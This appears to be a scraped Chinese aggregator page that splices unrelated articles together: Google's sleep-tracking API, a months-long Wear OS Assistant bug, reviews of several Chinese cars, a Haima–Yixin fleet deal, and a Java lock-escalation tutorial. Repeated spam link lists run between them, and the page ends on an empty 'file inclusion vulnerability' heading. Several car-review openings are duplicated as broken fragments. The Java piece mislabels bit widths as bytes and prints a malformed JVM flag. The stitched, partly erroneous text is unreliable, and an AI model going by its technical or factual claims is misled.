在市面上的活動追蹤器很多，但絕大多數都是關於活動、鍛鍊，當然這些很重要但並非衡量健康生活的唯一指標，睡眠也同樣重要，為了讓用戶培養更好的睡眠習慣，Google 釋出旗下新睡眠監測API，使所有Android 裝置更夠擁有更好的低耗電睡眠追蹤功能。

Google 釋出全新睡眠監測API，幫助健康應用更完善地追蹤

Android 上面已經有數款睡眠追蹤應用，你以為這款API 的釋出已經太晚、太遲了，但目前所有應用都使用獨立的偵測演算法和政策來確認用戶是否正在睡覺，或是已經醒來，而這些應用至少都必須在後台運行才能動作。這種方式也是有缺點的，其中之一就是當應用程式在後台持續運行時，手機會在無形中不斷耗電，使得大家在睡覺時不得不為手機充電，雖然廠商在想辦法改變背景運行的方式，但這也會使得睡眠追蹤數據變得不準確。

相較之下，睡眠API 是Android 系統上更廣泛的活動識別API 一部分，這表示它會被放到Google Play 服務中，並且提供一個標準和節約能源的方式來追蹤睡眠。睡眠監測API 將使用設備上的機器學習模型，根據手機光線和運動測器來推斷用戶的睡眠狀態，Google 表示新的API 可以避免開發者花費許多時間來開發自己的判定方式。此外，與其他睡眠追蹤API 相比，Google 的睡眠API 還具備有其他優勢，包含更少的耗電，還有在數據收集方面更可靠的功能，尤其是後者在現代人眼中格外重視。

如果你是開發者，現在就能試著使用Android 的新睡眠監測API，同時這支API 也會提示用戶必須授予ACTIVITY_RECOGNITION 許可，這可確保用戶能夠控制哪些應用可以跟蹤其睡眠。有興趣的開發者可以查閱Google API 說明文件來了解更多關於這款新API 的資訊。

【其他文章推薦】

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

※南投搬家公司費用,距離,噸數怎麼算?達人教你簡易估價知識!

※教你寫出一流的銷售文案?

※超省錢租車方案

※回頭車貨運收費標準

還記得Wear OS，那個從Android Wear變身而來的Google穿戴系統嗎？其實，小編以往是真的超級喜歡這個系統的產品的，特別是騎車停紅綠燈時超方便觀看通知的手勢操作，還能支援iOS也是十分不錯的特色。不過…繼續閱讀Google居然放任Wear OS語音助理功能壞了數個月…外媒細數種種「不妙」徵兆報導內文。

▲圖片來源：Google

Google 居然放任Wear OS 語音助理功能壞了數個月….

還有在使用Google的智慧穿戴產品？那你最近是否很想因為「Hey, Google」語音助理功能無法使用的問題，而真的想敲敲Google肩膀問聲「嘿！它到底怎麼了？」其實這個已經持續了數個月的故障狀況，也有很多人發現。只不過，到了被媒體揭露之後才開始聽到Google著手進行處理的動作。對於這樣的狀況，外媒感到有些「不妙」。

根據回報資料，這個在Wear OS上無法正常聲控啟動Google語音助理的問題，前前後後已經有不少人在官方頁面回報。然而真正炸裂的契機，反而是數個月後的近日，此事在Reddit被大幅度討論並引起外媒注意才得到了官方的正式回覆。更是因為裡面根本沒有提到任何預計時間讓用戶無法接受。

畢竟別的App或功能也就算了，這可是Google招牌的功能啊。外媒ArsTechnica更根據種種症狀，認為最近才收購Fitbit的Google也許真的無心經營Wear OS生態系。

像是Play Music與Hangouts在Google智慧錶系統中都沒有替代的方案，新的Google Chat則是尚未支援Wear OS。更諷刺的是，Apple Watch上反而找得到YouTube Music…再加上這次躺了幾個月叫不醒的Google Assistant的狀況，該網站認為這都是Wear OS平台死透的跡象。

是說，Android Wear也曾是小編非常喜歡搭配手機使用的穿戴裝置產品。如果問我對於Google穿戴系統的不好印象，主要還是在於系統更新沒幾次就不再支援舊硬體的狀況。變成如果想持續更新用到Android Wear / Wear OS的新功能的話，就得要時常購買新手錶。以上，再加上能支援Android的穿戴裝置也算百花齊放各有各的特色拿不出太多差異性，也許Wear OS才會走到目前這步吧…

【其他文章推薦】

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※自行創業缺乏曝光? 網頁設計幫您第一時間規劃公司的形象門面

※南投搬家公司費用需注意的眉眉角角，別等搬了再說!

※教你寫出一流的銷售文案?

※回頭車貨運收費標準

※別再煩惱如何寫文案,掌握八大原則!

車身長寬高為4310×1780×1680mm，軸距達到了2600mm。動力系統:奔騰X40或將搭載1。6L發動機，最大功率116馬力，峰值扭矩達到155牛米。傳動方面搭配5速手動和來自愛信的6速自動變速箱。競爭對手：長城汽車-哈弗H2s指導價：8。38-10。28萬在內飾的設計、用料上，哈弗H2s可謂佔盡優勢。

一汽奔騰在推出了入門轎車奔騰B30后，又再一次把目光投向火熱的SUV市場。近日一汽全新SUV-奔騰X40正式出現在人們的視野之中！

它的外觀沿襲了奔騰X80的設計語言，也以動感、大氣的風格為主！開眼角的頭燈造型和六邊形的中網設計很漂亮。

側面和尾部的設計很厚重、腰線力量感很足夠，車頂還採用了雙色車身的設計。

內飾則採用黑米雙色的設計，做工和用料也是一貫奔騰的風格。懸浮式中控大屏設計得體。

其實一汽奔騰X40採用一汽自主研發的A級平台打造而來。車身長寬高為4310×1780×1680mm，軸距達到了2600mm。

動力系統:

奔騰X40或將搭載1.6L發動機，最大功率116馬力，峰值扭矩達到155牛米。傳動方面搭配5速手動和來自愛信的6速自動變速箱。

競爭對手：

長城汽車-哈弗H2s

指導價：8.38-10.28萬

在內飾的設計、用料上，哈弗H2s可謂佔盡優勢。包括髮動機的功率也讓自吸的奔騰X40有些汗顏，但是動力匹配和穩定性上奔騰X40更有優勢。

編者點評：

奔騰X40的定位其實很符合現在消費者的需求，而它要是能在價格和配置上多些誠意的話，未來的銷量或迎來爆發。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※別再煩惱如何寫文案,掌握八大原則!

※教你寫出一流的銷售文案?

※超省錢租車方案

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※回頭車貨運收費標準

6L手動時尚貴了1萬元，發動機變為3缸1。2T的，性價比也不算很高。所以相比較來說，1。6L手動時尚版的性價比是最高的。豪華版比時尚版貴了5000左右，但是卻多了這麼多的配置，性價比不錯。另外1。2T自動豪華比1。6L自動豪華貴了8000元，相比較手動擋的10000元的差價還是實惠了一些。

在新款308之前，法系車-標緻在國內幾乎沒有一款可以拿得出手的緊湊型轎車，因為408價格較貴，老款的308實在是太丑了，所以在這個領域標緻的銷量一直比較差。

但是自從新款308上市之後，這個局面得到了一定程度的改善。憑藉著漂亮的外觀和不算太貴的價格，308十月份也交出了10226輛的銷量，表現還算可以。所以下面我們就來介紹一下這台車究竟哪款車的性價比最高（只介紹新款308）。

新款308於今年9月25日晚在西安宣布正式上市，新車搭載1.6L、1.2T、1.6T三種動力共計6款車型可以供消費者選擇，指導價為9.97-15.97萬元，不過老款車型改名為308經典，還將繼續在市場上銷售。

新款308要比老款的308強不少，所以這也是我們只推薦新款308的原因。308的車身尺寸為4590*1820*1488mm，軸距為2675mm，雖然尺寸不是很大，但這也是邁進了主流緊湊型轎車的水平。

標緻308使用了全新的EMp2平台，所以說相對於老款的拉皮308，進步也是非常大的。內飾造型前衛，並沒有完全照搬308S的內飾風格，使用了標緻家族最新的家族化設計，看起來更加新潮。

308的配置共分為三個等級，分別為時尚版、豪華版和尊貴版，同級別的配置大致上相等，這樣區分起來就比較簡單了。其中時尚版的主要配置有ESp、上坡輔助、鋁合金輪圈、LED日間行車燈等。這樣的配置水平算是處於中等水平吧！

1.6L手動時尚版為最低配車型，性價比還行，1.6L自動時尚比手動時尚貴了1.3萬元，只是多了一台6AT變速箱，這個價格確實有點貴了，性價比不高；1.2T手動時尚車型比1.6L手動時尚貴了1萬元，發動機變為3缸1.2T的，性價比也不算很高。

所以相比較來說，1.6L手動時尚版的性價比是最高的。

豪華版比時尚版貴了5000左右，但是卻多了這麼多的配置，性價比不錯。另外1.2T自動豪華比1.6L自動豪華貴了8000元，相比較手動擋的10000元的差價還是實惠了一些。另外1.2T車型的推背感更足，也更具有駕駛樂趣。

所以，1.6L、1.2T自動豪華型性價比很高。

到了1.6T車型，也就是頂配車型，配置確實比豪華型高了不少，並且1.6T發動機也是標緻的“當家花旦”，性能很不錯。只是高達15.97萬的售價，讓人望而卻步，因為有這麼多錢，為什麼不去買跑得更快的思域、名氣更大的速騰呢？

所以說，最推薦的還是1.6L、1.2T自動豪華型，其次是1.6L手動時尚版，頂配車型的性價比一般。因為這個價位的競爭對手太強大。不過目前308由於是剛上市，市場優惠較小，所以說和同級別比起來，性價比不是很高，小編覺得本來法系車的銷量就很一般，你如果不把性價比做上去，銷量還是不會有太大的進步的。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※超省錢租車方案

※教你寫出一流的銷售文案?

※網頁設計最專業,超強功能平台可客製化

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※台中搬家遵守搬運三大原則,讓您的家具不再被破壞!

【其他文章推薦】

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※超省錢租車方案

※教你寫出一流的銷售文案?

※網頁設計最專業,超強功能平台可客製化

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※台中搬家遵守搬運三大原則,讓您的家具不再被破壞!

配置上沒能显示百公里油耗。輪胎用的是佳通195，真令人無語。升降窗戶按鈕並沒有夜光燈，晚上是要瞎摸的節奏。目前行駛里程：現在開了2000公里，油耗穩定在6。9L/100km，手動擋果然是省油利器。車主：123木頭人購買車型：2016款 15N 自動精英型裸車購買價：10。

前言

英朗在中國一直給人居家好車的形象，因此銷量一直都很不錯。無論是底盤的厚實感，還是隔音都給人不錯的印象，事實到底怎麼樣，下面請看幾位車主的說法。

車主：DJ

購買車型：2016款 15N 自動精英型

裸車購買價：9.89萬

最滿意的點：性價比很高，開起來也比較容易上手。車裡的空間和座椅的舒適性都很好，之前車子載着4個人出外旅遊，無論前後左右的空間，都很寬敞。這車操控性不錯，指向也精準，很容易開。

最不滿意的點：油耗略微偏高了一點，門板上的儲物空間並不充足。動力也不是很充足，上長坡時會顯得乏力。內飾設計缺乏亮點，別克的車很擅於營造豪華感，但英朗就是一個特例。

目前行駛里程：現在已經開了3000公里，首保之前的油耗在8.2L/100km，做完首保以後就逐漸下降到7.2L/100km，還是很令人滿意。

車主：梁先生

購買車型：2016款 15N 手動進取型

裸車購買價：8.99萬

最滿意的點：外觀相當漂亮，特別是那銳利的日間行車燈，簡直攝人心魄。這個價位帶有車身穩定系統也很厚道。油耗很令我滿意。底盤的濾震有厚實感，面對坑窪以及橋頭跳都可以很安穩地應對。

最不滿意的點：作為一個20年的老煙槍，這車只配點煙器而沒有煙缸，確實太不像話了。配置上沒能显示百公里油耗。輪胎用的是佳通195，真令人無語。升降窗戶按鈕並沒有夜光燈，晚上是要瞎摸的節奏。

目前行駛里程：現在開了2000公里，油耗穩定在6.9L/100km，手動擋果然是省油利器。

車主：123木頭人

購買車型：2016款 15N 自動精英型

裸車購買價：10.19萬

最滿意的點：外觀時尚靚麗，紅色車身看起來更顯高貴。操控算是很優良，轉向基本指哪打哪。座椅的材質較為柔軟，後排座椅可以放倒，而前排也可以放得很低。性價比夠高，許多該有配置都有了。

最不滿意的點：動力很一般，油門響應也不夠快，緊急超車時動力並不能很好跟上。白色車身不耐臟，而且髒了以後，清潔麻煩。內飾設計比較普通，沒有別克應有的水準，感覺略微有點失望。

目前行駛里程：到現在為止，已經開了8700公里，百公里綜合油耗為7.5L左右，上到高速可以下降到6.5左右，很令我滿意。

編者總結：

從以上三位車主的說法中，可以看出英朗確實是一款居家好車，省心舒適。不過，如果你想要動力與很好的操控，就不該對它有所眷戀了。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※教你寫出一流的銷售文案?

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※回頭車貨運收費標準

※別再煩惱如何寫文案,掌握八大原則!

※超省錢租車方案

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※推薦台中搬家公司優質服務,可到府估價

福美來品牌新變 樹立共享車市場典範自九月底以來，海馬汽車開啟聚焦福美來品牌的全新戰略，將福美來從產品品牌升級為品類品牌，繼福美來轎車、福美來七座版后，再將福美來專車版納入福美來品牌體系，並與福美來七座版一道作為福美來家轎品牌下的首發明星組合進軍汽車租賃市場以及互聯網+汽車金融時代的家庭用車市場，則是福美來品牌新變后的一大重要營銷舉措。

月初，隨着《網絡預約出租汽車經營服務管理暫行辦法》的正式實施，各地的網約車細則也在陸續出台，共享車市場面臨整肅和洗牌，不少車型被網約車准入指標的高門檻拒之門外。不過，隨着汽車共享經濟的異軍突起，共享車市場發展趨勢不可逆轉。新政策的出台對廣大車企而言既是挑戰，更是機遇。抓住機會，創新變革，則有望分得共享經濟紅利。而福美來旗下的兩大車型–福美來七座版和福美來專車版便是新政施行之初的首批獲益者。

11月25日，海馬汽車與易鑫金融共享車合作暨福美來系列20000台訂單簽約儀式在海馬汽車大本營–海南海口成功舉行，福美來旗下兩大車型福美來七座版和福美來專車版分別憑藉七座大空間、愉悅尊貴等產品力優勢，以及穩定可靠的產品品質獲得易鑫金融的青睞。雙方達成20000輛車的供車合作協議，共同發力共享車市場。

易鑫金融是中國領先的互聯網汽車金融交易平台，易鑫金融旗下的易鑫車貸App及daikuan.com為廣大消費者提供新車貸款、二手車貸款、車主貸款，汽車租賃以及汽車保險等全方位的汽車金融服務。目前，累計服務用戶超1000萬人，日均線上個人車貸需求金額20億元，資產規模近200億元

福美來兩大旗艦車型 全面滿足共享車市場需求

作為2016年9月上市的多座版家用轎車，福美來七座版的超大空間、舒適安全等優點廣受市場認可。福美來七座版在整車尺寸上極具優勢，同時內部座椅角度也可進行靈活調整，實現了60種座椅組合方式，真正將空間的靈活多變性發揮到了極致，可最大限度滿足多人集體出行、商務接待、載物等需求。此外，福美來七座版在安全上也下足了功夫。

除了諸多厚道的主、被動安全配備，海馬自身對車輛實地安全測試和安全舒適駕乘做到嚴格把關，真正讓消費者感到安心和舒心，並且以互聯網思維為原點，結合家庭用戶兼顧商務用戶的使用需求，配備了HM-Link極智車載互聯繫統、高效T動力、及多項科技配置，使得福美來七座版給消費者帶來超越同級的舒適尊享駕乘感。

憑藉七座大空間的核心優勢、結合安靜舒適、強力安全和智能科技等強悍產品力，福美來七座版為多人出行提供更具溫情和性價比的解決方案，全面滿足了商務與多口之家的出行所需，從眾多車型中脫穎而出，成為了汽車租賃市場的先行者。

七座大空間，福美來七座版完美承載多人出行

相對於福美來七座版的適合多人出行優勢，福美來專車版在整車尊享駕控方面同樣惹人注目。據悉，福美來專車版是在海馬M8的基礎上針對共享車市場進行升級的定製版本，是福美來品牌升級后的又一重磅舉措。

兼具舒適與安全，福美來專車版精準駕控愉悅尊享

福美來專車版是海馬汽車在整車造車技術上的最高體現，在自主中高級車市場中，以整體造車解決方案獨樹一幟，轎跑底盤配合渦輪增壓發動機營造出強悍T動力，并力求通過精準駕控、全面安全、愉悅尊享等智能技術的應用為消費者提供了尊享高檔的駕乘享受，是一款充分洞察消費者用車需求后傾力打造的中高級座駕，非常適用於專車市場以及互聯網+汽車金融時代的家庭用車市場。

福美來品牌新變 樹立共享車市場典範

自九月底以來，海馬汽車開啟聚焦福美來品牌的全新戰略，將福美來從產品品牌升級為品類品牌，繼福美來轎車、福美來七座版后，再將福美來專車版納入福美來品牌體系，並與福美來七座版一道作為福美來家轎品牌下的首發明星組合進軍汽車租賃市場以及互聯網+汽車金融時代的家庭用車市場，則是福美來品牌新變后的一大重要營銷舉措。

海馬汽車集團股份有限公司執行董事、一汽海馬汽車有限公司總經理盧國綱說道：“借力此次合作，福美來品牌正式開啟共享車模式，一方面希望可以幫助有用車需求的用戶提供更加靈活方便、更高性價比、更豐富的車型選擇；幫助用戶避免不必要的消費，以租賃代替購買，養成更加共享和環保的出行方式，另一方面，希望可以解決大城市公共交通無法消化的出行需求。”福美來20000輛車進軍共享車市場，從租賃車和專車兩方面入手，在滿足廣大用戶高端出行需求的同時，也以強力安全、安靜舒適為駕乘者提供尊享優越的出行體驗，使用戶以更低費用獲取更具性價比的超值服務。

共享車經濟的發展，對汽車行業而言既是挑戰也是機遇。此次海馬與易鑫金融的聯袂合作，不僅是一汽海馬以市場為導向的积極應對，更是其在“互聯網+共享車+汽車營銷+移動出行”方面做出的前瞻布局。我們有理由相信，海馬攜手易鑫金融飲得共享車市場頭啖湯的同時，也必將成為汽車業和金融資本開展互聯網營銷創新的理想範本。

海馬汽車概況

海馬汽車集團股份有限公司（簡稱海馬汽車集團）位於海南省海口市金盤工業區金盤路12-8號，註冊資金16.5億元，總資產150億元，在深交所掛牌上市，股票代碼為000572，以汽車產業為主業，致力於中國民族汽車工業的發展。

海馬汽車集團旗下有海馬轎車有限公司、海馬商務汽車有限公司、一汽海馬汽車有限公司、上海海馬研發有限公司、海馬財務有限公司、金盤實業有限公司等。

二十餘年來，海馬汽車集團貼近中國汽車市場，秉承“開放合作、學習創新、自主多贏”的發展理念，堅持“先做精、后做強、再做穩、不爭大”的經營理念，建成海口、鄭州和上海三個產業基地，產品覆蓋麵包車、轎車、MpV、SUV和新能源汽車五大領域，直屬員工1萬多人，關聯企業員工3萬多人，年產值100多億元，累計納稅150多億元。

海馬汽車集團規劃年產銷整車一百萬輛。

易鑫金融概況

易鑫金融是中國領先的互聯網汽車金融交易平台，由易車、騰訊、京東、百度等互聯網巨頭注資60億元。易鑫金融旗下的易鑫車貸App及daikuan.com為廣大消費者提供新車貸款、二手車貸款、車主貸款，汽車租賃以及汽車保險等全方位的汽車金融服務。在線提供230個品牌汽車、2300餘家銀行及金融機構的金融產品可供用戶選擇，線下擁有5000人購車顧問、3萬餘家合作經銷商，服務遍及全國300多個城市。截至目前，累計服務用戶超1000萬人，日均線上個人車貸需求金額20億元，資產規模近200億元。本站聲明:網站內容來源於http://www.auto6s.com/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※超省錢租車方案

※別再煩惱如何寫文案,掌握八大原則!

※回頭車貨運收費標準

※教你寫出一流的銷售文案?

※產品缺大量曝光嗎?你需要的是一流包裝設計!

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※網頁設計最專業,超強功能平台可客製化

一、前言

鎖的狀態總共有四種，級別由低到高依次為：無鎖、偏向鎖、輕量級鎖、重量級鎖，這四種鎖狀態分別代表什麼，為什麼會有鎖升級？其實在 JDK 1.6之前，synchronized 還是一個重量級鎖，是一個效率比較低下的鎖，但是在JDK 1.6后，Jvm為了提高鎖的獲取與釋放效率對（synchronized ）進行了優化，引入了 偏向鎖 和 輕量級鎖 ，從此以後鎖的狀態就有了四種（無鎖、偏向鎖、輕量級鎖、重量級鎖），並且四種狀態會隨着競爭的情況逐漸升級，而且是不可逆的過程，即不可降級，也就是說只能進行鎖升級（從低級別到高級別），不能鎖降級（高級別到低級別），意味着偏向鎖升級成輕量級鎖后不能降級成偏向鎖。這種鎖升級卻不能降級的策略，目的是為了提高獲得鎖和釋放鎖的效率。

二、鎖的四種狀態

在 synchronized 最初的實現方式是 “阻塞或喚醒一個Java線程需要操作系統切換CPU狀態來完成，這種狀態切換需要耗費處理器時間，如果同步代碼塊中內容過於簡單，這種切換的時間可能比用戶代碼執行的時間還長”，這種方式就是 synchronized實現同步最初的方式，這也是當初開發者詬病的地方，這也是在JDK6以前 synchronized效率低下的原因，JDK6中為了減少獲得鎖和釋放鎖帶來的性能消耗，引入了“偏向鎖”和“輕量級鎖”。

所以目前鎖狀態一種有四種，從級別由低到高依次是：無鎖、偏向鎖，輕量級鎖，重量級鎖，鎖狀態只能升級，不能降級

如圖所示：

三、鎖狀態的思路以及特點

鎖狀態	存儲內容	標誌位
無鎖	對象的hashCode、對象分代年齡、是否是偏向鎖(0)	01
偏向鎖	偏向線程ID、偏向時間戳、對象分代年齡、是否是偏向鎖(1)	01
輕量級鎖	指向棧中鎖記錄的指針	00
重量級鎖	指向互斥量的指針	11

四、鎖對比

鎖	優點	缺點	適用場景
偏向鎖	加鎖和解鎖不需要額外的消耗，和執行非同步方法相比僅存在納秒級的差距	如果線程間存在鎖競爭，會帶來額外的鎖撤銷的消耗	適用於只有一個線程訪問同步塊場景
輕量級鎖	競爭的線程不會阻塞，提高了程序的響應速度	如果始終得不到索競爭的線程，使用自旋會消耗CPU	追求響應速度，同步塊執行速度非常快
重量級鎖	線程競爭不使用自旋，不會消耗CPU	線程阻塞，響應時間緩慢	追求吞吐量，同步塊執行速度較慢

五、Synchronized鎖

synchronized 用的鎖是存在Java對象頭裡的，那麼什麼是對象頭呢？

5.1 Java 對象頭

我們以 Hotspot 虛擬機為例，Hopspot 對象頭主要包括兩部分數據：Mark Word（標記字段） 和 Klass Pointer（類型指針）

Mark Word：默認存儲對象的HashCode，分代年齡和鎖標誌位信息。這些信息都是與對象自身定義無關的數據，所以Mark Word被設計成一個非固定的數據結構以便在極小的空間內存存儲盡量多的數據。它會根據對象的狀態復用自己的存儲空間，也就是說在運行期間Mark Word里存儲的數據會隨着鎖標誌位的變化而變化。

Klass Point：對象指向它的類元數據的指針，虛擬機通過這個指針來確定這個對象是哪個類的實例。

在上面中我們知道了，synchronized 用的鎖是存在Java對象頭裡的，那麼具體是存在對象頭哪裡呢？答案是：存在鎖對象的對象頭的Mark Word中，那麼MarkWord在對象頭中到底長什麼樣，它到底存儲了什麼呢？

在64位的虛擬機中：

在32位的虛擬機中：

下面我們以 32位虛擬機為例，來看一下其 Mark Word 的字節具體是如何分配的

無鎖：對象頭開闢 25bit 的空間用來存儲對象的 hashcode ，4bit 用於存放對象分代年齡，1bit 用來存放是否偏向鎖的標識位，2bit 用來存放鎖標識位為01

偏向鎖： 在偏向鎖中劃分更細，還是開闢 25bit 的空間，其中23bit 用來存放線程ID，2bit 用來存放 Epoch，4bit 存放對象分代年齡，1bit 存放是否偏向鎖標識， 0表示無鎖，1表示偏向鎖，鎖的標識位還是01

輕量級鎖：在輕量級鎖中直接開闢 30bit 的空間存放指向棧中鎖記錄的指針，2bit 存放鎖的標誌位，其標誌位為00

重量級鎖： 在重量級鎖中和輕量級鎖一樣，30bit 的空間用來存放指向重量級鎖的指針，2bit 存放鎖的標識位，為11

GC標記： 開闢30bit 的內存空間卻沒有佔用，2bit 空間存放鎖標誌位為11。

其中無鎖和偏向鎖的鎖標誌位都是01，只是在前面的1bit區分了這是無鎖狀態還是偏向鎖狀態

關於內存的分配，我們可以在git中openJDK中 markOop.hpp 可以看出：

public:
  // Constants
  enum { age_bits                 = 4,
         lock_bits                = 2,
         biased_lock_bits         = 1,
         max_hash_bits            = BitsPerWord - age_bits - lock_bits - biased_lock_bits,
         hash_bits                = max_hash_bits > 31 ? 31 : max_hash_bits,
         cms_bits                 = LP64_ONLY(1) NOT_LP64(0),
         epoch_bits               = 2
  };

• age_bits： 就是我們說的分代回收的標識，佔用4字節
• lock_bits： 是鎖的標誌位，佔用2個字節
• biased_lock_bits： 是是否偏向鎖的標識，佔用1個字節
• max_hash_bits： 是針對無鎖計算的hashcode 佔用字節數量，如果是32位虛擬機，就是 32 – 4 – 2 -1 = 25 byte，如果是64 位虛擬機，64 – 4 – 2 – 1 = 57 byte，但是會有 25 字節未使用，所以64位的 hashcode 佔用 31 byte
• hash_bits： 是針對 64 位虛擬機來說，如果最大字節數大於 31，則取31，否則取真實的字節數
• cms_bits： 不是64位虛擬機就佔用 0 byte，是64位就佔用 1byte
• epoch_bits： 就是 epoch 所佔用的字節大小，2字節。

5.2 Monitor

Monitor 可以理解為一個同步工具或一種同步機制，通常被描述為一個對象。每一個 Java 對象就有一把看不見的鎖，稱為內部鎖或者 Monitor 鎖。

Monitor 是線程私有的數據結構，每一個線程都有一個可用 monitor record 列表，同時還有一個全局的可用列表。每一個被鎖住的對象都會和一個 monitor 關聯，同時 monitor 中有一個 Owner 字段存放擁有該鎖的線程的唯一標識，表示該鎖被這個線程佔用。

Synchronized是通過對象內部的一個叫做監視器鎖（monitor）來實現的，監視器鎖本質又是依賴於底層的操作系統的 Mutex Lock（互斥鎖）來實現的。而操作系統實現線程之間的切換需要從用戶態轉換到核心態，這個成本非常高，狀態之間的轉換需要相對比較長的時間，這就是為什麼 Synchronized 效率低的原因。因此，這種依賴於操作系統 Mutex Lock 所實現的鎖我們稱之為重量級鎖。

隨着鎖的競爭，鎖可以從偏向鎖升級到輕量級鎖，再升級的重量級鎖（但是鎖的升級是單向的，也就是說只能從低到高升級，不會出現鎖的降級）。JDK 1.6中默認是開啟偏向鎖和輕量級鎖的，我們也可以通過-XX:-UseBiasedLocking=false來禁用偏向鎖。

六、鎖的分類

6.2 無鎖

無鎖是指沒有對資源進行鎖定，所有的線程都能訪問並修改同一個資源，但同時只有一個線程能修改成功。

無鎖的特點是修改操作會在循環內進行，線程會不斷的嘗試修改共享資源。如果沒有衝突就修改成功並退出，否則就會繼續循環嘗試。如果有多個線程修改同一個值，必定會有一個線程能修改成功，而其他修改失敗的線程會不斷重試直到修改成功。

6.3 偏向鎖

初次執行到synchronized代碼塊的時候，鎖對象變成偏向鎖（通過CAS修改對象頭裡的鎖標誌位），字面意思是“偏向於第一個獲得它的線程”的鎖。執行完同步代碼塊后，線程並不會主動釋放偏向鎖。當第二次到達同步代碼塊時，線程會判斷此時持有鎖的線程是否就是自己（持有鎖的線程ID也在對象頭裡），如果是則正常往下執行。由於之前沒有釋放鎖，這裏也就不需要重新加鎖。如果自始至終使用鎖的線程只有一個，很明顯偏向鎖幾乎沒有額外開銷，性能極高。

偏向鎖是指當一段同步代碼一直被同一個線程所訪問時，即不存在多個線程的競爭時，那麼該線程在後續訪問時便會自動獲得鎖，從而降低獲取鎖帶來的消耗，即提高性能。

當一個線程訪問同步代碼塊並獲取鎖時，會在 Mark Word 里存儲鎖偏向的線程 ID。在線程進入和退出同步塊時不再通過 CAS 操作來加鎖和解鎖，而是檢測 Mark Word 里是否存儲着指向當前線程的偏向鎖。輕量級鎖的獲取及釋放依賴多次 CAS 原子指令，而偏向鎖只需要在置換 ThreadID 的時候依賴一次 CAS 原子指令即可。

偏向鎖只有遇到其他線程嘗試競爭偏向鎖時，持有偏向鎖的線程才會釋放鎖，線程是不會主動釋放偏向鎖的。

關於偏向鎖的撤銷，需要等待全局安全點，即在某個時間點上沒有字節碼正在執行時，它會先暫停擁有偏向鎖的線程，然後判斷鎖對象是否處於被鎖定狀態。如果線程不處於活動狀態，則將對象頭設置成無鎖狀態，並撤銷偏向鎖，恢復到無鎖（標誌位為01）或輕量級鎖（標誌位為00）的狀態。

6.4 輕量級鎖（自旋鎖）

輕量級鎖是指當鎖是偏向鎖的時候，卻被另外的線程所訪問，此時偏向鎖就會升級為輕量級鎖，其他線程會通過自旋（關於自旋的介紹見文末）的形式嘗試獲取鎖，線程不會阻塞，從而提高性能。

輕量級鎖的獲取主要由兩種情況：
① 當關閉偏向鎖功能時；
② 由於多個線程競爭偏向鎖導致偏向鎖升級為輕量級鎖。

一旦有第二個線程加入鎖競爭，偏向鎖就升級為輕量級鎖（自旋鎖）。這裏要明確一下什麼是鎖競爭：如果多個線程輪流獲取一個鎖，但是每次獲取鎖的時候都很順利，沒有發生阻塞，那麼就不存在鎖競爭。只有當某線程嘗試獲取鎖的時候，發現該鎖已經被佔用，只能等待其釋放，這才發生了鎖競爭。

在輕量級鎖狀態下繼續鎖競爭，沒有搶到鎖的線程將自旋，即不停地循環判斷鎖是否能夠被成功獲取。獲取鎖的操作，其實就是通過CAS修改對象頭裡的鎖標誌位。先比較當前鎖標誌位是否為“釋放”，如果是則將其設置為“鎖定”，比較並設置是原子性發生的。這就算搶到鎖了，然後線程將當前鎖的持有者信息修改為自己。

長時間的自旋操作是非常消耗資源的，一個線程持有鎖，其他線程就只能在原地空耗CPU，執行不了任何有效的任務，這種現象叫做忙等（busy-waiting）。如果多個線程用一個鎖，但是沒有發生鎖競爭，或者發生了很輕微的鎖競爭，那麼synchronized就用輕量級鎖，允許短時間的忙等現象。這是一種折衷的想法，短時間的忙等，換取線程在用戶態和內核態之間切換的開銷。

6.4 重量級鎖

重量級鎖顯然，此忙等是有限度的（有個計數器記錄自旋次數，默認允許循環10次，可以通過虛擬機參數更改）。如果鎖競爭情況嚴重，某個達到最大自旋次數的線程，會將輕量級鎖升級為重量級鎖（依然是CAS修改鎖標誌位，但不修改持有鎖的線程ID）。當後續線程嘗試獲取鎖時，發現被佔用的鎖是重量級鎖，則直接將自己掛起（而不是忙等），等待將來被喚醒。

重量級鎖是指當有一個線程獲取鎖之後，其餘所有等待獲取該鎖的線程都會處於阻塞狀態。

簡言之，就是所有的控制權都交給了操作系統，由操作系統來負責線程間的調度和線程的狀態變更。而這樣會出現頻繁地對線程運行狀態的切換，線程的掛起和喚醒，從而消耗大量的系統資

五、總結

文中講述了鎖的四種狀態以及鎖是如何一步一步升級的過程，文中有理解不到位或者有問題的地方，歡迎大家在評論區中下方指出和交流，謝謝大家

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※自行創業缺乏曝光? 網頁設計幫您第一時間規劃公司的形象門面

※如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站，提高曝光率!

※綠能、環保無空污,成為電動車最新代名詞，目前市場使用率逐漸普及化

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※教你寫出一流的銷售文案?

※別再煩惱如何寫文案,掌握八大原則!

文件包含

目錄

• 文件包含
  • 1. 概述
    • 1.1 常見的引發漏洞的函數：
